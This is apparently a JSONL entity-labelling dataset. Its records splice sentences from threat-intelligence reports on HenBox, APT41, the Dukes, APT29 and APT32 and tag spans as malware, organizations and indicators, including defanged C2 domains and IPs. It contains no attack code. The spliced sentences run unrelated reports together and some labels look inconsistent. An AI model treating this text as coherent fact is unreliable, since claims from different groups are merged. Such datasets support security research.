{"text": "The primary goal of sux appears to be steal messages and other data from popular messaging and social media apps specified within the HenBox sample . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": [{"start": 134, "end": 140, "label": "Malware"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 409, "end": 418, "label": "Malware"}, {"start": 421, "end": 433, "label": "Malware"}, {"start": 475, "end": 483, "label": "Malware"}]}
{"text": "A similar tool , with the same filename , has been discussed in previous research but the SpyDealer malware appears unrelated to HenBox . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": [{"start": 90, "end": 99, "label": "Malware"}, {"start": 129, "end": 135, "label": "Malware"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 188, "end": 208, "label": "System"}, {"start": 330, "end": 339, "label": "Malware"}, {"start": 342, "end": 354, "label": "Malware"}, {"start": 396, "end": 404, "label": "Malware"}]}
{"text": "More likely , this is a case of common attack tools being re-used between different threat actor groups . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": [{"start": 128, "end": 136, "label": "Malware"}, {"start": 175, "end": 181, "label": "Organization"}, {"start": 280, "end": 302, "label": "Malware"}, {"start": 355, "end": 374, "label": "Organization"}, {"start": 395, "end": 419, "label": "Organization"}, {"start": 477, "end": 489, "label": "Malware"}]}
{"text": "This particular HenBox variant , as listed in Table 3 above , harvests data from two popular messaging and social media apps : Voxer Walkie Talkie Messenger ( com.rebelvox.voxer ) and Tencent \u2019 s WeChat ( com.tencent.mm ) . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": [{"start": 16, "end": 22, "label": "Malware"}, {"start": 127, "end": 132, "label": "System"}, {"start": 133, "end": 146, "label": "System"}, {"start": 147, "end": 156, "label": "System"}, {"start": 159, "end": 177, "label": "Indicator"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 196, "end": 202, "label": "System"}, {"start": 205, "end": 219, "label": "Indicator"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 350, "end": 358, "label": "System"}, {"start": 361, "end": 369, "label": "System"}, {"start": 372, "end": 377, "label": "System"}, {"start": 380, "end": 384, "label": "System"}, {"start": 391, "end": 398, "label": "System"}, {"start": 449, "end": 461, "label": "Organization"}, {"start": 518, "end": 524, "label": "Malware"}, {"start": 532, "end": 538, "label": "Malware"}]}
{"text": "These types of apps tend to store their data in databases and , as an example , HenBox accesses Voxer \u2019 s database from the file \u201c /data/data/com.rebelvox.voxer/databases/rv.db \u201d . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . Komplex shares a significant amount of functionality and traits with another tool used by Sofacy \u2013 the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows .", "spans": [{"start": 80, "end": 86, "label": "Malware"}, {"start": 131, "end": 176, "label": "Indicator"}, {"start": 181, "end": 189, "label": "System"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 270, "end": 275, "label": "Organization"}, {"start": 294, "end": 307, "label": "Organization"}, {"start": 312, "end": 334, "label": "Organization"}, {"start": 337, "end": 344, "label": "Malware"}, {"start": 427, "end": 433, "label": "Organization"}, {"start": 440, "end": 447, "label": "Malware"}, {"start": 461, "end": 467, "label": "Organization"}, {"start": 525, "end": 532, "label": "System"}]}
{"text": "Once opened , HenBox runs the following query to gather message information . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system \u2013 a move that showcases their continued evolution toward multi-platform attacks .", "spans": [{"start": 14, "end": 20, "label": "Malware"}, {"start": 78, "end": 86, "label": "System"}, {"start": 105, "end": 113, "label": "System"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 186, "end": 192, "label": "Organization"}, {"start": 205, "end": 209, "label": "Organization"}, {"start": 212, "end": 217, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 252, "end": 264, "label": "Organization"}, {"start": 277, "end": 291, "label": "Malware"}]}
{"text": "Not long after this variant was public , newer variants of HenBox were seen , and some had significant increases in the number of targeted apps . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease .", "spans": [{"start": 59, "end": 65, "label": "Malware"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 161, "end": 174, "label": "System"}, {"start": 248, "end": 262, "label": "Malware"}, {"start": 292, "end": 298, "label": "Organization"}, {"start": 302, "end": 309, "label": "Malware"}, {"start": 318, "end": 324, "label": "Malware"}, {"start": 394, "end": 401, "label": "System"}, {"start": 434, "end": 436, "label": "System"}]}
{"text": "Table 5 describes the latest variant seen in AutoFocus . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": [{"start": 73, "end": 88, "label": "Organization"}, {"start": 111, "end": 119, "label": "System"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 229, "end": 239, "label": "Malware"}, {"start": 242, "end": 251, "label": "Malware"}, {"start": 254, "end": 262, "label": "Malware"}, {"start": 277, "end": 282, "label": "Organization"}]}
{"text": "SHA256 Package Name App Name First Seen 07994c9f2eeeede199dd6b4e760fce3 71f03f3cc4307e6551c18d2fbd024a24f com.android.henbox \u5907\u4efd ( Backup ) January 3rd 2018 Table 6 contains an updated list of targeted apps from which this newer variant of HenBox is capable of harvesting data . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": [{"start": 40, "end": 71, "label": "Indicator"}, {"start": 72, "end": 105, "label": "Indicator"}, {"start": 106, "end": 124, "label": "Indicator"}, {"start": 239, "end": 245, "label": "Malware"}, {"start": 319, "end": 331, "label": "System"}, {"start": 336, "end": 345, "label": "System"}, {"start": 366, "end": 371, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 424, "end": 429, "label": "Organization"}]}
{"text": "Interestingly , the two communication apps described above as being targeted by the HenBox variant listed in Table 3 do not appear in this updated list . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": [{"start": 154, "end": 159, "label": "Organization"}, {"start": 180, "end": 205, "label": "System"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 367, "end": 375, "label": "Malware"}, {"start": 378, "end": 388, "label": "Malware"}, {"start": 391, "end": 400, "label": "Malware"}, {"start": 403, "end": 411, "label": "Malware"}, {"start": 414, "end": 423, "label": "Malware"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 436, "end": 446, "label": "Malware"}, {"start": 449, "end": 458, "label": "Malware"}, {"start": 465, "end": 475, "label": "Malware"}]}
{"text": "Package Name App Name com.whatsapp WhatsApp Messenger com.pugna.magiccall n/a org.telegram.messenger Telegram com.facebook.katana Facebook com.twitter.android Twitter jp.naver.line.android LINE : Free Calls & Messages com.instanza.cocovoice Coco com.beetalk BeeTalk com.gtomato.talkbox TalkBox Voice Messenger - PTT com.viber.voip Viber Messenger com.immomo.momo MOMO\u964c\u964c com.facebook.orca Messenger \u2013 Text and Video Chat for Free com.skype.rover In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found .", "spans": [{"start": 22, "end": 34, "label": "Indicator"}, {"start": 35, "end": 43, "label": "System"}, {"start": 44, "end": 53, "label": "System"}, {"start": 54, "end": 73, "label": "Indicator"}, {"start": 78, "end": 100, "label": "Indicator"}, {"start": 101, "end": 109, "label": "System"}, {"start": 110, "end": 129, "label": "Indicator"}, {"start": 130, "end": 138, "label": "System"}, {"start": 139, "end": 158, "label": "Indicator"}, {"start": 159, "end": 166, "label": "System"}, {"start": 167, "end": 188, "label": "Indicator"}, {"start": 189, "end": 193, "label": "System"}, {"start": 218, "end": 240, "label": "Indicator"}, {"start": 246, "end": 257, "label": "Indicator"}, {"start": 258, "end": 265, "label": "System"}, {"start": 266, "end": 285, "label": "Indicator"}, {"start": 286, "end": 293, "label": "System"}, {"start": 300, "end": 309, "label": "System"}, {"start": 316, "end": 330, "label": "Indicator"}, {"start": 331, "end": 336, "label": "System"}, {"start": 337, "end": 346, "label": "System"}, {"start": 347, "end": 362, "label": "Indicator"}, {"start": 363, "end": 369, "label": "System"}, {"start": 370, "end": 387, "label": "Indicator"}, {"start": 388, "end": 397, "label": "System"}, {"start": 429, "end": 444, "label": "Indicator"}, {"start": 460, "end": 465, "label": "Organization"}, {"start": 625, "end": 639, "label": "Organization"}, {"start": 658, "end": 666, "label": "Malware"}, {"start": 691, "end": 703, "label": "Malware"}, {"start": 704, "end": 711, "label": "Malware"}]}
{"text": "Skype ; 3rd party stores only Most of these apps are well established and available on Google Play , however , com.skype.rover appears to be available only on third-party app stores . In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 87, "end": 98, "label": "System"}, {"start": 111, "end": 126, "label": "Indicator"}, {"start": 205, "end": 210, "label": "Organization"}, {"start": 221, "end": 231, "label": "System"}, {"start": 330, "end": 335, "label": "Organization"}, {"start": 481, "end": 489, "label": "Malware"}, {"start": 581, "end": 586, "label": "Organization"}]}
{"text": "The same is likely to be the case for com.pugna.magiccall but this is unknown currently . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda .", "spans": [{"start": 38, "end": 57, "label": "Indicator"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 115, "end": 125, "label": "System"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 178, "end": 185, "label": "Organization"}, {"start": 231, "end": 248, "label": "Malware"}, {"start": 291, "end": 302, "label": "Organization"}, {"start": 355, "end": 374, "label": "Organization"}, {"start": 394, "end": 423, "label": "Organization"}]}
{"text": "It \u2019 s clear to see that the capabilities of HenBox are very comprehensive , both in terms of an Android app with its native libraries and given the amount of data it can glean from a victim . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . Importantly , PinchDuke trojan samples alACTs contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel .", "spans": [{"start": 45, "end": 51, "label": "Malware"}, {"start": 97, "end": 104, "label": "System"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 245, "end": 252, "label": "Vulnerability"}, {"start": 262, "end": 275, "label": "Vulnerability"}, {"start": 328, "end": 352, "label": "Malware"}, {"start": 449, "end": 460, "label": "Organization"}]}
{"text": "Such data includes contact and location information , phone and message activity , the ability to record from the microphone , camera , and other sensors as well as the capability to access data from many popular messaging and social media apps . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke \u2013 over the course of five years .", "spans": [{"start": 247, "end": 252, "label": "Organization"}, {"start": 266, "end": 282, "label": "Organization"}, {"start": 427, "end": 438, "label": "Organization"}, {"start": 547, "end": 557, "label": "Malware"}, {"start": 560, "end": 569, "label": "Malware"}, {"start": 576, "end": 584, "label": "Malware"}]}
{"text": "Infrastructure While investigating HenBox we discovered infrastructure ties to other malware families associated with targeted attacks against Windows users \u2013 notable overlaps included PlugX , Zupdax , 9002 , and Poison Ivy . We observed APT41 using a compromised account to create a scheduled task on a system , write a binary component of HIGHNOON containing the payload and C&C information to disk , and then modify the legitimate Windows WMI Performance Adaptor (wmiApSrv) to execute the HIGHNOON payload . The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": [{"start": 35, "end": 41, "label": "Malware"}, {"start": 143, "end": 150, "label": "System"}, {"start": 185, "end": 190, "label": "Malware"}, {"start": 193, "end": 199, "label": "Malware"}, {"start": 202, "end": 206, "label": "Malware"}, {"start": 213, "end": 223, "label": "Malware"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 515, "end": 520, "label": "Organization"}, {"start": 611, "end": 619, "label": "Malware"}, {"start": 624, "end": 632, "label": "Malware"}]}
{"text": "The overall image of these ties is below in Figure 5 and paints a picture of an adversary with at least 5 malware families in their toolbox dating back to at least 2015 . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 307, "end": 315, "label": "System"}, {"start": 320, "end": 324, "label": "System"}, {"start": 375, "end": 386, "label": "Organization"}, {"start": 406, "end": 414, "label": "Malware"}]}
{"text": "The overlap between the HenBox and 9002 malware families Unit 42 has seen involves three shared C2s between several samples ; the first IP below is used for more than half of the HenBox samples we have seen to date : 47.90.81 [ . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": [{"start": 24, "end": 30, "label": "Malware"}, {"start": 35, "end": 39, "label": "Malware"}, {"start": 179, "end": 185, "label": "Malware"}, {"start": 217, "end": 229, "label": "Indicator"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 465, "end": 470, "label": "Organization"}]}
{"text": "] 23 222.139.212 [ . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": [{"start": 5, "end": 20, "label": "Indicator"}, {"start": 44, "end": 49, "label": "Organization"}, {"start": 74, "end": 85, "label": "System"}, {"start": 102, "end": 117, "label": "System"}, {"start": 120, "end": 128, "label": "System"}, {"start": 131, "end": 139, "label": "System"}, {"start": 142, "end": 164, "label": "System"}, {"start": 274, "end": 280, "label": "Organization"}]}
{"text": "] 16 lala513.gicp [ . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same ACT .", "spans": [{"start": 5, "end": 21, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 38, "end": 46, "label": "System"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}]}
{"text": "] net The overlaps between the Henbox , PlugX , Zupdax , and Poison Ivy malware families involves a web of shared C2s and IP resolutions centered around the below : 59.188.196 [ . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 40, "end": 45, "label": "Malware"}, {"start": 48, "end": 54, "label": "Malware"}, {"start": 61, "end": 71, "label": "Malware"}, {"start": 165, "end": 179, "label": "Indicator"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 360, "end": 371, "label": "Organization"}, {"start": 497, "end": 507, "label": "Malware"}]}
{"text": "] 172 cdncool [ . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": [{"start": 6, "end": 17, "label": "Indicator"}, {"start": 38, "end": 43, "label": "Organization"}, {"start": 54, "end": 64, "label": "System"}, {"start": 105, "end": 113, "label": "System"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 192, "end": 202, "label": "Malware"}]}
{"text": "] com ( and third-levels of this domain ) www3.mefound [ . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke .", "spans": [{"start": 42, "end": 58, "label": "Indicator"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 265, "end": 272, "label": "Malware"}, {"start": 277, "end": 287, "label": "Malware"}]}
{"text": "] com www5.zyns [ . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 20, "end": 25, "label": "Organization"}]}
{"text": "] com w3.changeip [ . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": [{"start": 6, "end": 21, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 45, "end": 49, "label": "System"}, {"start": 54, "end": 63, "label": "System"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 279, "end": 289, "label": "Malware"}]}
{"text": "] org Ties to previous activity The registrant of cdncool [ . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": [{"start": 50, "end": 61, "label": "Indicator"}, {"start": 129, "end": 146, "label": "System"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 212, "end": 217, "label": "System"}, {"start": 349, "end": 362, "label": "Vulnerability"}, {"start": 373, "end": 381, "label": "Malware"}, {"start": 435, "end": 443, "label": "Vulnerability"}, {"start": 484, "end": 491, "label": "Vulnerability"}]}
{"text": "] com also registered six other domains . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation .", "spans": [{"start": 162, "end": 167, "label": "Organization"}]}
{"text": "To date , Unit 42 has seen four of the seven ( the first three in the list below , along with cdncool [ . APT41 has been observed creating a RAR archive of targeted files for exfiltration . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard TIME timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": [{"start": 94, "end": 105, "label": "Indicator"}, {"start": 106, "end": 111, "label": "Organization"}, {"start": 264, "end": 282, "label": "Malware"}, {"start": 427, "end": 437, "label": "Malware"}]}
{"text": "] com ) used in malicious activity and it is reasonable to assume the remaining three are or were intended to serve the same purpose . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years .", "spans": [{"start": 125, "end": 134, "label": "Indicator"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 318, "end": 326, "label": "Organization"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 371, "end": 376, "label": "Organization"}]}
{"text": "tcpdo [ . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS .", "spans": [{"start": 40, "end": 45, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 251, "end": 267, "label": "Malware"}, {"start": 276, "end": 307, "label": "Malware"}, {"start": 382, "end": 388, "label": "Organization"}]}
{"text": "] net adminsysteminfo [ . Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY .", "spans": [{"start": 6, "end": 25, "label": "Indicator"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 240, "end": 248, "label": "Organization"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 307, "end": 314, "label": "Malware"}]}
{"text": "] com md5c [ . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years .", "spans": [{"start": 6, "end": 14, "label": "Indicator"}, {"start": 15, "end": 20, "label": "Organization"}, {"start": 40, "end": 56, "label": "Organization"}, {"start": 59, "end": 74, "label": "Organization"}, {"start": 81, "end": 97, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 272, "end": 277, "label": "Organization"}]}
{"text": "] net linkdatax [ . For example , the group has repeatedly targeted call record information at telecom companies . In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 38, "end": 43, "label": "Organization"}, {"start": 95, "end": 102, "label": "Organization"}, {"start": 103, "end": 112, "label": "Organization"}, {"start": 137, "end": 145, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 194, "end": 201, "label": "Malware"}]}
{"text": "] com csip6 [ . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . POSHSPY is an excellent example of the skill and craftiness of APT29 .", "spans": [{"start": 6, "end": 15, "label": "Indicator"}, {"start": 16, "end": 21, "label": "Organization"}, {"start": 94, "end": 104, "label": "Organization"}, {"start": 107, "end": 116, "label": "Organization"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 142, "end": 149, "label": "Organization"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 215, "end": 220, "label": "Organization"}]}
{"text": "] biz adminloader [ . The group\u2019s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware . FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests .", "spans": [{"start": 6, "end": 21, "label": "Indicator"}, {"start": 94, "end": 113, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 227, "end": 232, "label": "Organization"}]}
{"text": "] com Unit 42 published a blog in July 2016 about 9002 malware being delivered using a combination of shortened links and a file hosted on Google Drive . In another instance , APT41 targeted a hotel\u2019s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": [{"start": 50, "end": 54, "label": "Malware"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 457, "end": 468, "label": "Organization"}, {"start": 493, "end": 503, "label": "Organization"}, {"start": 508, "end": 519, "label": "Organization"}]}
{"text": "The spear phishing emails had Myanmar political-themed lures and , if the 9002 C2 server responded , the Trojan sent system specific information along with the string \u201c jackhex \u201d . These supply chain compromise tactics have also been characteristic of APT41\u2019s best known and most recent espionage campaigns . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": [{"start": 74, "end": 78, "label": "Malware"}, {"start": 252, "end": 259, "label": "Organization"}, {"start": 374, "end": 404, "label": "Organization"}, {"start": 451, "end": 456, "label": "Organization"}]}
{"text": "\u201c jackhex \u201d has also been part of a C2 for what is likely related Poison Ivy activity detailed below , along with additional infrastructure ties . Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers . From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": [{"start": 66, "end": 76, "label": "Malware"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 445, "end": 475, "label": "Organization"}, {"start": 522, "end": 527, "label": "Organization"}]}
{"text": "The C2 for the aforementioned 9002 sample was logitechwkgame [ . Mapping the group\u2019s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 30, "end": 34, "label": "Malware"}, {"start": 46, "end": 64, "label": "Indicator"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 360, "end": 371, "label": "Indicator"}, {"start": 431, "end": 439, "label": "Organization"}]}
{"text": "] com , which resolved to the IP address 222.239.91 [ . The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group\u2019s later espionage operations . In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 .", "spans": [{"start": 41, "end": 55, "label": "Indicator"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 144, "end": 163, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}, {"start": 335, "end": 342, "label": "Organization"}, {"start": 368, "end": 373, "label": "Organization"}]}
{"text": "] 30 . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": [{"start": 7, "end": 12, "label": "Organization"}, {"start": 55, "end": 71, "label": "System"}, {"start": 76, "end": 81, "label": "System"}, {"start": 235, "end": 240, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 357, "end": 368, "label": "Indicator"}]}
{"text": "At the same time , the domain admin.nslookupdns [ . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors .", "spans": [{"start": 23, "end": 51, "label": "Indicator"}, {"start": 84, "end": 89, "label": "Organization"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 202, "end": 207, "label": "Organization"}, {"start": 218, "end": 238, "label": "Organization"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}, {"start": 316, "end": 335, "label": "Organization"}]}
{"text": "] com also resolved to the same IP address , suggesting that these two domains are associated with the same threat actors . APT41 often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims . APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL .", "spans": [{"start": 124, "end": 129, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 354, "end": 364, "label": "Malware"}, {"start": 367, "end": 375, "label": "Malware"}, {"start": 378, "end": 387, "label": "Malware"}, {"start": 394, "end": 401, "label": "Malware"}]}
{"text": "In addition , admin.nslookupdns [ . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": [{"start": 14, "end": 35, "label": "Indicator"}, {"start": 36, "end": 41, "label": "Organization"}, {"start": 210, "end": 228, "label": "Organization"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 342, "end": 350, "label": "Organization"}, {"start": 375, "end": 395, "label": "Organization"}]}
